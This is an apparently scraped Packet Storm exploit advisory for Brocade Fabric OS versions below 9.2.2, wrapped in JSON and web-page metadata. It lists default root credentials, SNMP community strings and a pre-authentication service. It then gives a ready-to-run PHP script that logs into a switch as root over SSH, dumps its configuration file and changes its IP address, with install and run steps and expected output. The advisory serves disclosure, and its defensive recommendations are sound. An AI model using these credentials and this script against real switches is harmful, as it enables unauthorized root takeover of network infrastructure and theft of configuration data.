{“lastseen”:”2025-11-26T18:14:46″,”description”:”This analysis focuses on some older flaws with Brocade Fabric OS versions prior to 9.2.2 related to man-in-the-middle, weak cryptography, and hardcoded key compromise vulnerabilities…”,”published”:”2025-11-26T00:00:00″,”modified”:”2025-11-26T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Brocade Fabric OS Weak Crypto \/ Key Compromise”,”source”:””,”references”:””,”id”:”PACKETSTORM:212104″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2021-27797″,”CVE-2022-33186″],”sourceData”:”=============================================================================================================================================\\n | # Title : Brocade Fabric OS \\u003c 9.2.2 \u2013 10 Critical Vulnerabilities Allowing MITM, Weak Crypto and Hardcoded Key Compromise |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits) |\\n | # Vendor : https:\/\/www.broadcom.com\/products\/fibre-channel-networking\/switches |\\n =============================================================================================================================================\\n \\n POC :\\n \\n [+] Summary\\n ————————————————————\\n \\n Brocade Fabric OS versions older than 9.2.2 suffer from multiple\\n high\u2011risk vulnerabilities including remote code execution,\\n information disclosure, man\u2011in\u2011the\u2011middle, weak cryptography,\\n hardcoded keys, insecure SNMP services, and exploitable default\\n root credentials. A remote attacker can completely compromise the\\n device, execute commands as root, modify network configuration,\\n extract sensitive configuration files, and push malicious firmware.\\n \\n ————————————————————\\n [+] Vulnerabilities\\n ————————————————————\\n \\n [1] Default \\u0026 Weak Credentials (CVE-2021-27797)\\n – Username: root\\n – Password: fibranne\\n Allows full SSH\/Telnet\/web root access.\\n \\n [2] Pre\u2011Authentication RCE (CVE-2022-33186)\\n – ezswitchsetup protocol on 52357\/udp runs as root.\\n – No authentication required.\\n – Attacker can change passwords, alter configs, or take full control.\\n \\n [3] Insecure SNMP Access\\n – SNMP communities: \u201cSecret C0de\u201d, \u201cOrigEquipMfr\u201d.\\n – Full system info disclosure.\\n – Potential MITM \u2192 malicious firmware upload.\\n \\n [4] Insecure HTTP\/Java Access\\n – Credentials sent in base64.\\n – Java management clients downloadable without validation.\\n – Command injection possible.\\n \\n ————————————————————\\n 3. PoC \u2013 Remote Root Access (PHP)\\n ————————————————————\\n \\n \\u003c?php\\n require ‘vendor\/autoload.php’;\\n use phpseclib3\\\\Net\\\\SSH2;\\n \\n if ($argc \\u003c 2) {\\n exit(\\”Usage: php poc.php \\u003ctarget_ip\\u003e\\\\n\\”);\\n }\\n \\n $target = $argv[1];\\n $user = ‘root’;\\n $pass = ‘fibranne’;\\n \\n $ssh = new SSH2($target);\\n if (!$ssh-\\u003elogin($user, $pass)) {\\n exit(\\”[-] Login failed.\\\\n\\”);\\n }\\n \\n echo \\”[+] Login success!\\\\n\\”;\\n \\n \/\/ Read sensitive configuration file\\n $config = $ssh-\\u003eexec(‘cat \/etc\/fabos\/fabos.0.conf’);\\n echo \\”[+] Configuration file content:\\\\n\\”;\\n echo $config;\\n \\n \/\/ Example of remote command execution (proof only)\\n $new_ip = ‘192.168.1.100’;\\n $ssh-\\u003eexec(\\”ifconfig eth0 $new_ip netmask 255.255.255.0\\”);\\n \\n echo \\”[+] IP address changed to $new_ip (PoC demonstration).\\\\n\\”;\\n ?\\u003e\\n \\n ————————————————————\\n 4. PoC Execution Guide\\n ————————————————————\\n \\n Step 1 \u2013 Install phpseclib:\\n composer require phpseclib\/phpseclib\\n \\n Step 2 \u2013 Save the file as:\\n poc.php\\n \\n Step 3 \u2013 Run the PoC:\\n php poc.php \\u003cTARGET-IP\\u003e\\n \\n Example:\\n php poc.php 10.13.3.8\\n \\n Expected Output:\\n [+] Login success!\\n [+] Configuration file content:\\n \\u003csystem config appears\\u003e\\n [+] IP address changed to 192.168.1.100\\n \\n ————————————————————\\n 5. Recommendations\\n ————————————————————\\n \\n – Immediately change all default credentials.\\n – Restrict management interfaces (SSH\/SNMP\/HTTP).\\n – Disable ezswitchsetup protocol.\\n – Upgrade to Fabric OS 9.2.2 or later.\\n – Monitor logs for unauthorized access.\\n – Verify firmware integrity regularly.\\n \\n ————————————————————\\n 6. References\\n ————————————————————\\n \\n https:\/\/pierrekim.github.io\/advisories\/2025-brocade-switches.txt\\n https:\/\/pierrekim.github.io\/blog\/2025-03-31-brocade-switches-10-vulnerabilities.html\\n https:\/\/www.broadcom.com\/products\/fibre-channel-networking\/switches\\n \\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/212104″,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/212104\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-11-26T18:14:46″,”description”:”This analysis focuses on some older flaws with Brocade Fabric OS versions prior to 9.2.2 related to man-in-the-middle, weak cryptography, and hardcoded key compromise vulnerabilities…”,”published”:”2025-11-26T00:00:00″,”modified”:”2025-11-26T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-27746","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n